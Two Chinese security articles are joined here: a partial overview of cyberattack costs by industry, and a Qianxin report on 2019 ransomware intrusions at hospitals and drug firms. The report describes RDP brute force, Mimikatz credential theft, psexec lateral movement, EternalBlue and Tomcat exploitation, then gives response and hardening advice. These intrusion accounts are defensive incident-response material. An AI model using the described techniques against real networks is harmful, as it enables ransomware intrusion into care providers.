遭受攻击的医疗行业组织平均成本高达140万美元。许多医疗机构如果发现网络攻击不及时,照样需要付出一定的成本来恢复。专家说,大多数组织在至少18个月后才发现遭受了网络攻击。

攻击没有被检测到的时间越长,损坏的可能性就越高。而且,如果医疗机构在发现攻击后没有使用网络安全响应计划,则成本会上升。

timg (1).jpg

二、零售业

随着越来越多人喜欢网购,黑客也看准了零售业这个利润颇丰的“香饽饽”。 2016年的统计数据显示,每个遭受攻击后的零售记录平均付出成本为172美元。其中一些费用涉及聘请顾问以修复系统。此外,还需要对客户做出赔偿,以及因为不够安全为信用损失买单。

人们越来越不能忍受零售商的大规模数据泄露。此外,正是因为网购便捷,选择多样,所以如果人们不在一家店买东西,他们可以选择另一

timg (2).jpg

三、制造业

一般来说,以往的制造业不太需要连接互联网,但如今也在发生着变化。许多厂商意识到让生产设备保持连网状态可以帮助他们跟踪趋势,避免停机等。

网络攻击成本很难直接计算的原因之一是有很多相关成本可能不会立即显现出来。例如,制造厂商可以预计网络攻击本身的成本比如修复系统,约为170万美元。但是,其他费用可能很快就会显现出来,包括影响生产、客户流失以及雇佣额外员工来帮助在网络攻击后进行清理等。

研究员还表示,制造业对黑客极具吸引力。除了导致供应链中断的计划攻击之外,黑客将对制造商的攻击作为民族国家攻击的一部分。尽管这些攻击占整体攻击的的比例小,但2017年的解决时间是去年的500倍

timg (4).jpg

四、金融业

金融业的性质及其资金交易使得网络攻击在此行业司空见惯,以每年约1800万美元的网络犯罪成本名列榜首。

但是,成本也取决于金融机构遭受的攻击类型。两个组织合作发布的一份报告显示,金融机构的恶意软件攻击平均成本为825000美元。 但是,对于分布式拒绝服务(DDoS)攻击,费用则急剧上升,高达180万美元。

尽管如此,对金融业的攻击数量依旧在上升。与英国企业相关的研究证实,与2017年相比,2018年金融机构报告的黑客数量增加了五倍。这一趋势表明,金融机构必须特别警惕,以防范未来的攻击。

五、未来形势不容乐观

以上只是一些行业网络攻击经济成本的概况。 然而,即使文中尚未涉及的行业也应关注潜在的损失。许多网络安全专家都认为,网络攻击的费用总体上正在稳步上升。网络犯罪分子策略日益复杂,解决方案所需的费用和精力也日益攀升。

处理攻击的初始后果只是一个开始。 公司还必须向客户保证已经采取措施防止出现其他问题,并始终致力于实现这一承诺。所有这些方面都需要大量的金钱投入,也要进一步认识到网络攻击是真正的威胁攻击。

*参考来源,securityaffairs,Sandra1432编译,转载须注明来自FreeBuf.COM

医疗卫生行业令人尊敬,它是患者寄托生死大任的职业,无论是医院,卫生院,医疗器械,药店等等,你都把自己的健康和生命交给了它。而一些恶魔,却将犯罪之手伸向了这片圣洁之地,殊不知其呱呱坠地之时,同样来自医院之劳,忘其恩也罢,却损其利,将成千上万病人病例、药方、学术报告等重要医疗卫生资料通过恶意计算机病毒加密成一个不可查看文件,并以此勒索医院,交赎金还原文件。

奇安信威胁情报中心一直对此类犯罪活动表示谴责,并持续与这类勒索软件攻击的黑产团伙进行对抗。今年以来,奇安信安全服务团队在全国各地执行了大量医疗卫生行业大大小小的勒索攻击应急响应案例统计发现, 90%均为黑产团伙针对医院、药业、医疗器械的定向攻击行为。鉴于许多医疗卫生行业的网络安全防护措施并未健全,人员的安全意识的有待加强,因此在被定向攻击的时候,往往造成不可挽回的损失。

因此,红雨滴团队基于奇安信安服团队将近期典型的针对医疗卫生行业的勒索攻击案例汇成案例集,提供给医疗卫生从业者和公众参考,引起警惕从而采取必要的措施避免威胁的影响,黑产团伙只要有利益可以获取而不用担心牢狱之灾是永远都不会收手的。

针对CT机的攻击

相对于个人PC而言,医疗机械中内嵌的Windows系统大多为Win2000,WinXP,Win7等低版本且未更新最新补丁的状态。

而XX市中心医院的一台CT机,就由于不定时的发生蓝屏重启现象,且此前主机存在数个病毒文件,如勒索软件、木马等,运维人员已对该CT机进行备份处置。

在对流量进行还原过程中,发现攻击者对该CT机网段进行了流量嗅探和分析。

通过研判,发现多个主机针对该CT机的445端口进行访问,并建立IPC连接,经判断,其被攻击者使用“永恒之蓝”MS17-010高危漏洞发起攻击。

因此除了及时对工控机打补丁外,还要进行下列操作:

1. 工控机与PC主机进行网络隔离。

2. 工控主机网络前端加防火墙。

3. 架设工控主机安全终端,做单机防护。

内网Windows服务器被勒索

内网,即局域网,一般为政企单位最为脆弱之地,主要由于较多管理者认为,在内网通向外网的出入口处做好防护措施,即可保障内网的安全,这也就导致攻击者进入内网后畅通无阻,使用各种招数进行横向移动。

以下为2019年以来几起典型的内网服务器被勒索的案例。

客服服务器被入侵,投放Attention勒索软件

某大学某医院遭受未知勒索软件攻击,根据对内网已知中勒索的服务器进行日志分析,最终定位到源头机器为客服服务器,并且该机器上存在攻击者上传的Mimikatz及抓密码的记录。

当时中招的机器口令均设置一致且为弱口令,建议全面修改机器口令。

在所有中招机器中发现被加密文件后缀格式为:*. -XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX,并留有勒索文本至服务器内,勒索软件名为Attention。

此外,内网还存在大量尝试IPC连接局域网机器的记录,试图爆破密码。

弱口令登陆外网服务器

某医院遭受GandCrab攻击,经过排查分析发现源头为对外开放的服务器,被黑客通过该服务器弱口令远程登录,并获取到192.168网段服务器的远程登录权限,随后利用该服务器对内网服务器进行IPC暴力破解,在将大量设备的权限获取完毕后,投放勒索病毒。

域控主机被加密

某药业公司,内网出现大量勒索病毒有横向传播的迹象,域控已被加密。

排查后发现终端被植入勒索病毒加密后缀为:.Rabbit4444 ,通过查找在 C:\User\xxxx\AppData\Local 下发现加密模块程序:Rabbit4444.exe ,确认是 Globelmposter 勒索病毒。

根据登录日志查看攻击者一次登录成功,所以判断攻击者事先已经掌握域管理账号信息不存在爆破行为,证明很有可能使用Mimikatz抓取成功,再次证明域控主机作为内网命脉,更应该在登陆其他设备查看信息后,及时修改密码。

此外,某医疗器械公司,三台域控主机被加密,被感染MegaCortex勒索病毒。经过排查,多台被爆破主机上均存在可疑服务rstwg,通过迹象分析,判断为勒索加密程序。

从一些主机上发现攻击者的一些黑客工具,发现其中两个批处理脚本攻击者自行编写的横向移动工具,如通过文件共享传播恶意文件,还有一个脚本是使用psexec(远程系统和远程支持工具),以xxx用户名,xxx密码连接各个服务器,并运行rstwg服务,这跟之前推断的rstwg为勒索病毒程序的假设吻合,且用户名密码为超级管理员密码。

外网主机3389端口被密码爆破入侵

某医学检验公司遭受Globelmposter勒索软件攻击,攻击者首先通过爆破外网xxxx:3389远程登陆成功后(即成功登录10.x.x.x内网地址),利用其地址作为跳板机,对其内网地址进行大量的IPC爆破,爆破成功后,通过登录RDP进行投毒,投毒后将其样本清除,并继续爆破下一台主机或虚拟机。

此外多个卫生院,卫健局/委,以及多个医院,均被使用上述模式入侵成功,同样被投放一样的勒索软件。

通过OA服务器入侵

某医院遭受GandCrab勒索攻击,从内网进行排查,发现GandCrab勒索软件的传播途径大多为RDP&IPC暴力破解,并在成功入侵主机后会创建名称为KprocessHacker2的系统服务。

这里值得一提的是,ProcessHacker是一款进程管理软件,经常被恶意攻击者利用来强制结束杀毒软件进程。

而从内到外进行排查发现,攻击入口指向医院的OA服务器。从判断OA服务器被勒索的时间是否在爆发时间内,可推测为攻击者手工投毒,并且此OA服务器为攻击者掌握的主要跳板机,继续对日志进行分析,发现存在OA隐藏账号的IPC登录记录。

可见攻击者通过本机本地地址,登录IPC服务,并使用的账号为OAAPP服务创建的隐藏账号,正常情况下不会有人采用此帐号进行IPC登录,判断此登录记录为攻击者得到OA的webshell之后使用OA服务器作为代理来进行远程IPC登录,随后攻击者进行提权操作,将权限提升至system。最后推测幕后攻击者的入侵方式为中间件/Web入侵,如JBoss/Weblogic反序列化漏洞、Struts2命令执行命令等。

通过VPN帐号弱口令爆破入侵

某卫生健康委员会,多台业务服务器被Crysis勒索软件加密。

对防火墙旁挂设备VPN核查配置及日志溯源,发现VPN有关联资源配置权限发布可疑(10.x.x.x整个网段),有账号登录后直接可以访问该遭受勒索病毒服务器IP地址网段。从VPN日志中分析,发现“(单位名)(数字)”用户账号曾在异常时间成功登录,经过确认该账号无人使用。且VPN用户账号密码存在弱口令,可以使用密码对账号进行枚举爆破,也可以对账号进行暴力破解。 此后,攻击者对遭受勒索病毒服务器IP地址网段的RDP协议远程桌面账号密码进行暴力破解。

综上所述,经过统计2019年上半年来的数十起的勒索软件攻击可以发现,通过弱口令,口令爆破方式入侵成功的案例占比80%,且基本上,在通过3389远程桌面端口进入受害者主机后,均会采取内网横向移动入侵的方式,如继续暴力破解,Mimikatz抓密码等方式,在权限获取完毕后,投放勒索软件获利。

Linux服务器被勒索

某医药公司感染Satan勒索病毒,通过对系统文件、进程及日志等分析,发现其Linux服务器被攻击者通过PUT方式上传了satan.jsp文件,使用的为Apache Tomcat 远程代码执行漏洞(CVE-2017-12615)。

对被加密的文件进行排查,被加密文件后缀为.satan_pro,且加密释放的特征文件为.conn、.crypt和.Ssession,确定为Linux版本的Santan勒索病毒变种Lucky。

定向攻击手段的勒索攻击事件

一家医院被入侵,攻击源竟来自另一家医院?

某人民医院遭受GandCrab勒索软件攻击,加密后缀为ZMIGZF。

通过排查系统日志发现,攻击源来自10.x.x.2,其多次进行RDP登录爆破,并于2019年初爆破成功,从而导致某人民医院受损。 紧接着,在其被加密的服务器日志中,发现攻击源来自另一家某某医院,前往某某医院排查后,发现攻击源10.x.x.2也被加密,根据其登录日志分析,同网段的10.x.x.3服务器也被攻破,但其文件未加密,疑似黑客作为跳板服务器。

排查10.x.x.3时发现其早于2016年即被攻陷(存在黑客上传的webshell),于2018年开始有频繁的境外IP登录记录,可见策划已久。在主机中发现若干黑客工具,多为内网渗透提权工具,其读取了10.x.x.3服务器的密码。而由于某某医院内网服务器均为同一密码,虽然不是弱口令,但其通过猜测,用同样的密码登录到10.x.x.2服务器上,执行了加密,本机加密结束后,病毒自身的口令破解模块成功登录到某人民医院服务器,从而导致被加密。

可见此次攻击幕后的黑客,潜伏周期长,配合攻击手段多,且针对性打击强,医院方面务必全方面防护入口点。

攻击者定期下载加密文件,伪造设备被勒索的状态

某中医院在凌晨1点大面积感染GlobeImposter勒索病毒,经过日志回溯发现,其专门被3389爆破进入,且服务器中的浏览器存在下载爆破字典的行为。

此后利用字典进行横向爆破个人机成功后,个人机安装的THIS4客户端每天都会更新(.bat文件),并会从已经感染病毒的服务器中下载整个目录,而此目录的文件都已被加密,从而导致给用户一种感染勒索软件病毒的假象,其实只是攻击者拷贝了一批被加密的文件(包括桌面快捷方式)。

而通过搜索发现,THIS4是医院的信息管理系统,会处理门诊挂号等操作,可见攻击者对医院的系统极为熟悉。

WannaCry阴魂不散

外包开发团队接入内网,WannaCry突现雄风

某大学某医院内网大量机器发现445攻击流量,内网部署的IDS设备识别该攻击为MS17-010永恒之蓝漏洞攻击。最后发现是Wannacry勒索病毒,可见病毒已经出现1年半了,该病毒在内网的威力还是如此之大。该部门存在经常有外包开发团队到现场接入内网的情况,

某肿瘤医院,未装杀毒软件导致WannaCry复燃

内网共存在10多台主机和服务器可能受到勒索病毒影响,其服务器因未安装杀毒软件受到勒索病毒攻击。确认病毒为WannaCry蠕虫勒索病毒, 其传播手段为利用“永恒之蓝”漏洞,攻击内网其他机器的445端口进行横向传播。

而除了上述两家医院,还有多家医院也因类似的原因和场景导致一个早已过时的WannaCry勒索软件加密从而无法解密,同时侧面反映,医疗卫生行业,内网中没有打关键漏洞补丁还有很多,而一旦存在入口点,配合蠕虫化的武器,那将会是一场灾难。

用于攻击的勒索软件

经统计发现,2019年上半年来,针对医疗卫生行业的勒索软件种类并不丰富,主要集中在GandCrab,Globelmposter,而自从GandCrab“退休后”,其继任者Sodinokibi在6月中旬后攻势猛烈,同时,一种名为Attension的新型勒索软件也悄悄开辟新战场。

下图为针对医疗卫生行业的勒索趋势图,同时起对于整个行业的勒索攻击趋势也有参考意义。

以下为针对行业的真实攻击事件中发现的勒索家族种类简介。

GandCrab

目前均可解密,后缀随机,计算机加密后背景会直接显示GandCrab+版本号

解密工具下载地址:

http://download.bitdefender.com/am/malware_removal/BDGandCrabDecryptTool.exe

而目前大部分分析人员普遍认为,其继任者为Sodinoki勒索软件,也同样出现在近期的勒索软件攻击热潮中。

Globelmposter

暂无解密手段,其后缀名特征会使用十二生肖的英文名+数字的风格(如:Rabbit6666、Dragon6666),或者古希腊十二神的英文名+数字作为加密文件后缀(如:Aphrodite666、Ares666)。

勒索信格式如下:

Crysis

以多种后缀如.phobos为后缀,同样在针对中国政企进行攻击。

Tater

新型勒索病毒,加密算法采用了RSA+AES的方式,暂无法解密,后缀格式为[email protected]

MegaCortex

勒索软件,以.aes128ctr为加密扩展名:

Attention

勒索病毒,被勒索文件的后缀为随机的字母和数据编码*. -XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX

WannaCry

问世主要为了实施破坏性攻击,因此更不存在解密方法。

而需要注意的是,虽然目前GandCrab是在被完全解密前的投放量和成功率最高的勒索软件,但并不代表之后背后的攻击者不会再继续发起勒索软件攻击,因为攻击者还是原来的攻击者,仅仅是勒索软件提供商(如“继任者”Sodinoki勒索软件)发生了变化,勒索软件攻防仍然是业界一大难题。

总结来说,勒索病毒广泛利了Windows远程桌面的密码破解攻击,同时还可能会用到其他多种攻击方法 ,主要的传播方式如下:

1、Windows远程桌面密码破解

2、系统及程序漏洞(如永恒之蓝、office办公软件漏洞等)

3、人工入侵,投放勒索病毒

4、钓鱼邮件、钓鱼网站

整个勒索病毒产业链攻击流程如下:

自救手段

当我们已经确认感染勒索病毒后,应当及时采取必要的自救措施。之所以要进行自救,主要是因为:等待专业人员的救助往往需要一定的时间,采取必要的自救措施,可以减少等待过程中,损失的进一步扩大。例如:与被感染主机相连的其他服务器也存在漏洞或是有缺陷,将有可能也被感染。所以,采取自救措施的目的是为了及时止损,将损失降到最低。

正确处置方法

(一)隔离中招主机

处置方法

当确认服务器已经被感染勒索病毒后,应立即隔离被感染主机,隔离主要包括物理隔离和访问控制两种手段,物理隔离主要为断网或断电;访问控制主要是指对访问网络资源的权限进行严格的认证和控制。

1)物理隔离

物理隔离常用的操作方法是断网和关机。

断网主要操作步骤包括:拔掉网线、禁用网卡,如果是笔记本电脑还需关闭无线网络。

2)访问控制

访问控制常用的操作方法是加策略和修改登录密码。

加策略主要操作步骤为:在网络侧使用安全设备进行进一步隔离,如防火墙或终端安全监测系统;避免将远程桌面服务(RDP,默认端口为3389)暴露在公网上(如为了远程运维方便确有必要开启,则可通过VPN登录后才能访问),并关闭445、139、135等不必要的端口。

修改登录密码的主要操作为:立刻修改被感染服务器的登录密码;其次,修改同一局域网下的其他服务器密码;第三,修改最高级系统管理员账号的登录密码。修改的密码应为高强度的复杂密码,一般要求:采用大小写字母、数字、特殊符号混合的组合结构,口令位数足够长(15位、两种组合以上)。

处置原理

隔离的目的,一方面是为了防止感染主机自动通过连接的网络继续感染其他服务器;另一方面是为了防止黑客通过感染主机继续操控其他服务器。

有一类勒索病毒会通过系统漏洞或弱密码向其他主机进行传播,如WannaCry勒索病毒,一旦有一台主机感染,会迅速感染与其在同一网络的其他电脑,且每台电脑的感染时间约为1-2分钟左右。所以,如果不及时进行隔离,可能会导致整个局域网主机的瘫痪。

另外,近期也发现有黑客会以暴露在公网上的主机为跳板,再顺藤摸瓜找到核心业务服务器进行勒索病毒攻击,造成更大规模的破坏。

当确认服务器已经被感染勒索病毒后,应立即隔离被感染主机,防止病毒继续感染其他服务器,造成无法估计的损失。

(二)排查业务系统

处置方法

在已经隔离被感染主机后,应对局域网内的其他机器进行排查,检查核心业务系统是否受到影响,生产线是否受到影响,并检查备份系统是否被加密等,以确定感染的范围。

处置原理

业务系统的受影响程度直接关系着事件的风险等级。评估风险,及时采取对应的处置措施,避免更大的危害。另外,备份系统如果是安全的,就可以避免支付赎金,顺利的恢复文件。

所以,当确认服务器已经被感染勒索病毒后,并确认已经隔离被感染主机的情况下,应立即对核心业务系统和备份系统进行排查。

(三)联系专业人员

在应急自救处置后,建议第一时间联系专业的技术人士或安全从业者,对事件的感染时间、传播方式,感染家族等问题进行排查。

中招客户可以联系奇安信集团,全国400应急热线:4008136 360转2转4。

或者访问奇安信集团官网www.qianxin.com及时寻求帮助。

错误处置方法

(一)使用移动存储设备

错误操作

当确认服务器已经被感染勒索病毒后,在中毒电脑上使用U盘、移动硬盘等移动存储设备。

错误原理

勒索病毒通常会对感染电脑上的所有文件进行加密,所以当插上U盘或移动硬盘时,也会立即对其存储的内容进行加密,从而造成损失扩大。从一般性原则来看,当电脑感染病毒时,病毒也可能通过U盘等移动存储介质进行传播。

所以,当确认服务器已经被感染勒索病毒后,切勿在中毒电脑上使用U盘、移动硬盘等设备。

(二)读写中招主机上的磁盘文件

错误操作

当确认服务器已经被感染勒索病毒后,轻信网上的各种解密方法或工具,自行操作。反复读取磁盘上的文件后反而降低数据正确恢复的概率。

错误原理

很多流行勒索病毒的基本加密过程为:

1)首先,将保存在磁盘上的文件读取到内存中;

2)其次,在内存中对文件进行加密;

3)最后,将修改后的文件重新写到磁盘中,并将原始文件删除。

也就是说,很多勒索病毒在生成加密文件的同时,会对原始文件采取删除操作。理论上说,使用某些专用的数据恢复软件,还是有可能部分或全部恢复被加密文件的。

而此时,如果用户对电脑磁盘进行反复的读写操作,有可能破坏磁盘空间上的原始文件,最终导致原本还有希望恢复的文件彻底无法恢复。

安全建议

1、 系统、应用相关用户杜绝使用弱口令,应使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,加强管理员安全意识,禁止密码重用的情况出现;

2、 禁止服务器主动发起外部连接请求,对于需要向外部服务器推送共享数据的,应使用白名单的方式,在出口防火墙加入相关策略,对主动连接IP范围进行限制;

3、 有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,其他端口一律禁止访问,仅管理员IP可对管理端口进行访问,如FTP、数据库服务、远程桌面等管理端口;

4、 部署高级威胁监测设备,及时发现恶意网络流量,同时可进一步加强追踪溯源能力,对安全事件发生时可提供可靠的追溯依据;

5、 配置并开启相关关键系统、应用日志,对系统日志进行定期异地归档、备份,避免在攻击行为发生时,导致无法对攻击途径、行为进行溯源等,加强安全溯源能力;

6、 建议在服务器或虚拟化环境上部署虚拟化安全管理系统,提升防恶意软件、防暴力破解等安全防护能力;

7、 建议安装相应的防病毒软件,及时对病毒库进行更新,并且定期进行全面扫描,加强服务器上的病毒清除能力;

8、 定期开展对系统、应用以及网络层面的安全评估、渗透测试以及代码审计工作,主动发现目前系统、应用存在的安全隐患;

9、 加强日常安全巡检制度,定期对系统配置、网络设备配合、安全日志以及安全策略落实情况进行检查,常态化信息安全工作;

当然,最重要的一点就是,务必打全补丁!远程桌面服务远程代码执行漏洞Bluekeep已面世许久,商业化的渗透测试工具已具备批量攻击的功能,而近期微软又曝光多个远程桌面服务远程代码执行漏洞,因此,即使将弱口令修改为强口令,若主机存在漏洞,那仍然存在被入侵的高风险,请务必重视。

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM